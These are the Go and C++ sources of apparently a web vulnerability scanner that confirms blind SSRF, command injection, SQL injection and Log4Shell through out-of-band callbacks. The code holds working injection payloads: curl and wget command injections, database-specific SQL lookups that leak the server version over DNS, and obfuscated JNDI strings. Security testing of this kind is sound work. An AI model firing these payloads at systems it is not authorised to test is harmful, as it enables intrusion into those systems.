File: pkg/scanner/oob_confirmed.go
package scanner

import (
	"fmt"
	"net/url"
	"strings"
	"sync"
	"time"

	"github.com/zanicool/apex-cli/pkg/crawler"
	"github.com/zanicool/apex-cli/pkg/engine"
	"github.com/zanicool/apex-cli/pkg/oob"
)

// --- Blind SSRF (OOB Confirmed) ---

func scanBlindSSRF(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, oobClient *oob.Client) []Finding {
	var findings []Finding
	if oobClient == nil || !oobClient.Active() {
		return findings
	}

	ssrfParams := []string{"url", "uri", "link", "src", "source", "fetch", "request",
		"proxy", "redirect", "image", "avatar", "webhook", "callback", "endpoint", "dest", "href"}

	var mu sync.Mutex
	sem := make(chan struct{}, cfg.Threads)
	var wg sync.WaitGroup

	for u, params := range crawl.Params {
		for _, p := range params {
			pLower := strings.ToLower(p)
			isSSRF := false
			for _, sp := range ssrfParams {
				if strings.Contains(pLower, sp) {
					isSSRF = true
					break
				}
			}
			if !isSSRF {
				continue
			}

			wg.Add(1)
			go func(baseURL, param string) {
				defer wg.Done()
				sem <- struct{}{}
				defer func() { <-sem }()

				uid := oobClient.GenerateUID()
				payload := oobClient.PayloadURL(uid)
				testURL := injectParam(baseURL, param, payload)
				http.Get(testURL)

				// Wait for callback
				time.Sleep(2 * time.Second)
				if oobClient.Poll(uid, 6*time.Second) {
					mu.Lock()
					findings = append(findings, Finding{
						Type: "Blind SSRF (OOB Confirmed)", Severity: "critical",
						URL: testURL, Param: param, Payload: payload,
						Detail:   "DNS/HTTP callback received — server made outbound request to attacker-controlled domain",
						Template: "apex-blind-ssrf",
					})
					mu.Unlock()
				}
			}(u, p)
		}
	}
	wg.Wait()
	return findings
}

// --- Blind Command Injection (OOB Confirmed) ---

func scanBlindCMDi(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, oobClient *oob.Client) []Finding {
	var findings []Finding
	if oobClient == nil || !oobClient.Active() {
		return findings
	}

	var mu sync.Mutex
	sem := make(chan struct{}, cfg.Threads)
	var wg sync.WaitGroup

	for u, params := range crawl.Params {
		for _, p := range params {
			wg.Add(1)
			go func(baseURL, param string) {
				defer wg.Done()
				sem <- struct{}{}
				defer func() { <-sem }()

				uid := oobClient.GenerateUID()
				oobURL := oobClient.PayloadURL(uid)

				payloads := []string{
					fmt.Sprintf(";curl %s", oobURL),
					fmt.Sprintf("|curl %s", oobURL),
					fmt.Sprintf("`curl %s`", oobURL),
					fmt.Sprintf("$(curl %s)", oobURL),
					fmt.Sprintf(";wget %s", oobURL),
					fmt.Sprintf("& nslookup %s &", oobClient.DNSPayload(uid)),
				}

				for _, payload := range payloads {
					testURL := injectParam(baseURL, param, payload)
					http.Get(testURL)
				}

				time.Sleep(3 * time.Second)
				if oobClient.Poll(uid, 5*time.Second) {
					mu.Lock()
					findings = append(findings, Finding{
						Type: "Blind Command Injection (OOB Confirmed)", Severity: "critical",
						URL: baseURL, Param: param,
						Detail:   "Server executed injected command — callback received at OOB server",
						Template: "apex-blind-cmdi",
					})
					mu.Unlock()
				}
			}(u, p)
		}
	}
	wg.Wait()
	return findings
}

// --- Blind SQLi (OOB Confirmed) ---

func scanBlindSQLiOOB(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, oobClient *oob.Client) []Finding {
	var findings []Finding
	if oobClient == nil || !oobClient.Active() {
		return findings
	}

	var mu sync.Mutex
	sem := make(chan struct{}, cfg.Threads)
	var wg sync.WaitGroup

	for u, params := range crawl.Params {
		for _, p := range params {
			wg.Add(1)
			go func(baseURL, param string) {
				defer wg.Done()
				sem <- struct{}{}
				defer func() { <-sem }()

				uid := oobClient.GenerateUID()
				oobDomain := oobClient.DNSPayload(uid)

				payloads := []string{
					// MySQL
					fmt.Sprintf("' AND LOAD_FILE(CONCAT('\\\\\\\\',version(),'.%s\\\\a'))-- -", oobDomain),
					// MSSQL
					fmt.Sprintf("'; EXEC master..xp_dirtree '//%s/a'-- -", oobDomain),
					// PostgreSQL
					fmt.Sprintf("'; COPY (SELECT '') TO PROGRAM 'nslookup %s'-- -", oobDomain),
					// Oracle
					fmt.Sprintf("' AND UTL_HTTP.REQUEST('http://%s/')='1", oobDomain),
				}

				for _, payload := range payloads {
					testURL := injectParam(baseURL, param, payload)
					http.Get(testURL)
				}

				time.Sleep(3 * time.Second)
				if oobClient.Poll(uid, 5*time.Second) {
					mu.Lock()
					findings = append(findings, Finding{
						Type: "Blind SQL Injection (OOB DNS Confirmed)", Severity: "critical",
						URL: baseURL, Param: param,
						Detail:   "Database executed DNS lookup to attacker domain — blind SQLi confirmed",
						Template: "apex-blind-sqli-oob",
					})
					mu.Unlock()
				}
			}(u, p)
		}
	}
	wg.Wait()
	return findings
}

// --- Log4Shell (OOB Confirmed) ---

func scanLog4Shell(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, oobClient *oob.Client) []Finding {
	var findings []Finding
	if oobClient == nil || !oobClient.Active() {
		return findings
	}

	uid := oobClient.GenerateUID()
	oobDomain := oobClient.PayloadURL(uid)

	log4jPayloads := []string{
		fmt.Sprintf("${jndi:ldap://%s/}", oobDomain),
		fmt.Sprintf("${jndi:dns://%s}", oobClient.DNSPayload(uid)),
		fmt.Sprintf("${${lower:j}ndi:ldap://%s/}", oobDomain),
		fmt.Sprintf("${${::-j}${::-n}${::-d}${::-i}:ldap://%s/}", oobDomain),
		fmt.Sprintf("${j${:}ndi:ldap://%s/}", oobDomain),
	}

	// Inject into every possible vector
	for _, page := range crawl.Pages[:min(15, len(crawl.Pages))] {
		for _, payload := range log4jPayloads[:3] {
			// Headers (most common vector)
			items := []engine.RequestItem{{
				URL:    page.URL,
				Method: "GET",
				Headers: map[string]string{
					"User-Agent":      payload,
					"X-Forwarded-For": payload,
					"Referer":         payload,
					"X-Api-Version":   payload,
					"Authorization":   "Bearer " + payload,
				},
			}}
			for range http.BatchRequest(items, 1) {
			}

			// Query param
			sep := "?"
			if strings.Contains(page.URL, "?") {
				sep = "&"
			}
			http.Get(page.URL + sep + "q=" + url.QueryEscape(payload))

			// POST body
			http.Post(page.URL, "text/plain", payload)
		}
	}

	// Check for callbacks
	time.Sleep(4 * time.Second)
	if oobClient.Poll(uid, 6*time.Second) {
		target := ""
		if len(crawl.Pages) > 0 {
			target = crawl.Pages[0].URL
		}
		findings = append(findings, Finding{
			Type: "Log4Shell RCE (CVE-2021-44228) — OOB Confirmed", Severity: "critical",
			URL: target, Detail: "JNDI lookup reached attacker server — full RCE via LDAP/RMI",
			Template: "apex-log4shell",
		})
	}
	return findings
}

File: src/scanners/oob_confirmed.cpp
/// @file scanners/oob_confirmed.cpp
/// @brief OOB-confirmed scanners with callback verification loop.
///        Upgrades blind findings to confirmed critical when OOB server
///        receives callbacks.
#include "scanner_base.hpp"
#include <chrono>
#include <thread>

namespace apex {
namespace {

/// Poll OOB server for callback confirmation.
bool poll_oob(HttpClient &http, const std::string &oob_server,
              const std::string &uid, int timeout_secs = 8) {
  std::string poll_url = oob_server + "/poll/" + uid;
  auto deadline = std::chrono::steady_clock::now() +
                  std::chrono::seconds(timeout_secs);

  while (std::chrono::steady_clock::now() < deadline) {
    auto resp = http.get(poll_url);
    if (resp.status_code == 200 && resp.body.find("true") != std::string::npos)
      return true;
    std::this_thread::sleep_for(std::chrono::seconds(1));
  }
  return false;
}

/// Generate a unique ID for OOB correlation.
std::string gen_uid() {
  auto now = std::chrono::system_clock::now().time_since_epoch();
  auto ms = std::chrono::duration_cast<std::chrono::milliseconds>(now).count();
  return "apex" + std::to_string(ms % 1000000000);
}

/// Blind SSRF with OOB confirmation.
/// Scanner implementation.
std::vector<Finding> scan_blind_ssrf_confirmed(const Config &cfg, HttpClient &http,
                                               const CrawlResult &crawl) {
  std::vector<Finding> findings;
  if (cfg.no_oob || crawl.urls.empty()) return findings;

  const std::vector<std::string> ssrf_params = {
      "url", "uri", "link", "src", "source", "fetch", "request",
      "proxy", "redirect", "image", "avatar", "webhook", "callback"};

  // Iterate over targets.
  for (const auto &url : crawl.urls) {
    for (const auto &p : crawl.params) {
      if (p.url != url) continue;
      bool is_ssrf = false;
      for (const auto &sp : ssrf_params) {
        if (p.name.find(sp) != std::string::npos) { is_ssrf = true; break; }
      }
      if (!is_ssrf) continue;

      std::string uid = gen_uid();
      std::string payload = cfg.oob_server + "/" + uid;
      std::string test_url = url + "?" + p.name + "=" + payload;
      http.get(test_url);

      std::this_thread::sleep_for(std::chrono::seconds(2));
      if (poll_oob(http, cfg.oob_server, uid)) {
        findings.push_back({"Blind SSRF (OOB Confirmed)", "critical", test_url,
                            "DNS/HTTP callback received — server made outbound request",
                            p.name, payload, ""});
      }
    }
  }
  return findings;
}

/// Blind CMDi with OOB confirmation.
/// Scanner implementation.
std::vector<Finding> scan_blind_cmdi_confirmed(const Config &cfg, HttpClient &http,
                                               const CrawlResult &crawl) {
  std::vector<Finding> findings;
  if (cfg.no_oob || crawl.urls.empty()) return findings;

  // Iterate over targets.
  for (const auto &url : crawl.urls) {
    auto targets = get_targets(crawl, url, "cmd");
    for (const auto &[base, param] : targets) {
      std::string uid = gen_uid();
      std::string oob_url = cfg.oob_server + "/" + uid;

      const std::vector<std::string> payloads = {
          "; curl " + oob_url,
          "| curl " + oob_url,
          "$(curl " + oob_url + ")",
          "`curl " + oob_url + "`",
          "; wget " + oob_url,
      };

      for (const auto &payload : payloads)
        http.get(base + payload);

      std::this_thread::sleep_for(std::chrono::seconds(3));
      if (poll_oob(http, cfg.oob_server, uid)) {
        findings.push_back({"Blind Command Injection (OOB Confirmed)", "critical",
                            url, "Server executed injected command — callback received",
                            param, "", ""});
        break;
      }
    }
  }
  return findings;
}

/// Blind SQLi with OOB DNS confirmation.
/// Scanner implementation.
std::vector<Finding> scan_blind_sqli_confirmed(const Config &cfg, HttpClient &http,
                                               const CrawlResult &crawl) {
  std::vector<Finding> findings;
  if (cfg.no_oob || crawl.urls.empty()) return findings;

  std::string oob_host = cfg.oob_server;
  size_t s = oob_host.find("://");
  if (s != std::string::npos) oob_host = oob_host.substr(s + 3);
  size_t c = oob_host.find(':');
  if (c != std::string::npos) oob_host = oob_host.substr(0, c);

  // Iterate over targets.
  for (const auto &url : crawl.urls) {
    auto targets = get_targets(crawl, url);
    for (const auto &[base, param] : targets) {
      std::string uid = gen_uid();
      std::string dns = uid + "." + oob_host;

      const std::vector<std::string> payloads = {
          "' AND LOAD_FILE(CONCAT('\\\\\\\\',version(),'."+dns+"\\\\a'))-- -",
          "'; EXEC master..xp_dirtree '//"+dns+"/a'-- -",
          "'; COPY (SELECT '') TO PROGRAM 'nslookup "+dns+"'-- -",
          "' AND UTL_HTTP.REQUEST('http://"+dns+"/')='1",
      };

      for (const auto &payload : payloads)
        http.get(base + payload);

      std::this_thread::sleep_for(std::chrono::seconds(3));
      if (poll_oob(http, cfg.oob_server, uid)) {
        findings.push_back({"Blind SQL Injection (OOB DNS Confirmed)", "critical",
                            url, "Database executed DNS lookup — blind SQLi confirmed",
                            param, "", ""});
        break;
      }
    }
  }
  return findings;
}

/// Log4Shell with OOB confirmation.
/// Scanner implementation.
std::vector<Finding> scan_log4shell_confirmed(const Config &cfg, HttpClient &http,
                                              const CrawlResult &crawl) {
  std::vector<Finding> findings;
  if (cfg.no_oob || crawl.urls.empty()) return findings;

  std::string uid = gen_uid();
  std::string oob_url = cfg.oob_server + "/" + uid;

  const std::vector<std::string> payloads = {
      "${jndi:ldap://" + oob_url + "/}",
      "${${lower:j}ndi:ldap://" + oob_url + "/}",
      "${${::-j}${::-n}${::-d}${::-i}:ldap://" + oob_url + "/}",
  };

  const std::vector<std::string> headers = {
      "User-Agent", "X-Forwarded-For", "Referer", "X-Api-Version", "Authorization"};

  size_t limit = std::min(crawl.urls.size(), size_t(15));
  for (size_t i = 0; i < limit; ++i) {
    for (const auto &payload : payloads) {
      std::vector<std::pair<std::string, std::string>> hdrs;
      for (const auto &h : headers) hdrs.push_back({h, payload});
      http.get(crawl.urls[i], hdrs);
      http.post(crawl.urls[i], payload, "text/plain");
    }
  }

  std::this_thread::sleep_for(std::chrono::seconds(4));
  if (poll_oob(http, cfg.oob_server, uid)) {
    findings.push_back({"Log4Shell RCE (CVE-2021-44228) — OOB Confirmed", "critical",
                        crawl.urls[0], "JNDI lookup reached attacker server — full RCE",
                        "", "", ""});
  }
  return findings;
}

} // namespace

std::vector<Scanner> register_oob_confirmed_scanners() {
  return {
      {"Blind SSRF (Confirmed)", scan_blind_ssrf_confirmed},
      {"Blind CMDi (Confirmed)", scan_blind_cmdi_confirmed},
      {"Blind SQLi (Confirmed)", scan_blind_sqli_confirmed},
      {"Log4Shell (Confirmed)", scan_log4shell_confirmed},
  };
}

} // namespace apex
